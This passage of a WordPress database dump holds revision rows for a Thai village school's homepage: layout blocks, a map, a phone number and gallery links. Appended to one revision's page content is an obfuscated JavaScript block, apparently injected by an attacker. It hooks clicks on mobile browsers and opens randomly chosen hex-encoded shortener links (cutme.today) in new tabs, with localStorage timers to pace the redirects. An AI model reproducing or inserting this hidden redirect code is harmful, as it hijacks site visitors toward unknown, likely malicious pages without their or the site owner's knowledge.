{\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingBgColor\":\"#eee9da\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"y6fpy3h2\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"viewBgColor\":\"#27ccc105\",\"headingBgColor\":\"#32e6a4\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d5452.291688605335!2d104.62712667989774!3d14.917446024068381!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116c03ca70059ff%3A0x6b24a4a42a852eab!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lia4LmJ4Liy4LiZ4Lir4LiZ4Lit4LiH4Lib4Lil4Liy4LmA4LiC4LmH4LiH!5e0!3m2!1sth!2sth!4v1722057516298!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนบ้านหนองปลาเข็ง-กอไหล่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">ตำบล โพธิ์ อำเภอ โนนคูณ ศรีสะเกษ 33250</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ :  093-325-2659 ผู้อำนวยการโรงเรียน</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2FbannongpakhaengSchool%3Flocale%3Dth_TH&tabs=timeline&width=330&height=50&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2024-08-01 09:27:55','2024-08-01 02:27:55','',14,'http://pakhaeng.ssk.in.th/?p=321',0,'revision','',0),
(323,1,'2024-08-01 09:36:42','2024-08-01 02:36:42','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"f2a87680\",\"mediaId\":23,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f2a87680\"><img class=\"gb-image gb-image-f2a87680\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/โรงเรียนบ้านโคกสะอาด.png\" alt=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\" title=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_bc537f-5a\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_bc537f-5a\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_1da0eb-4e\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_add57c-9d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_add57c-9d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_745a05-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap 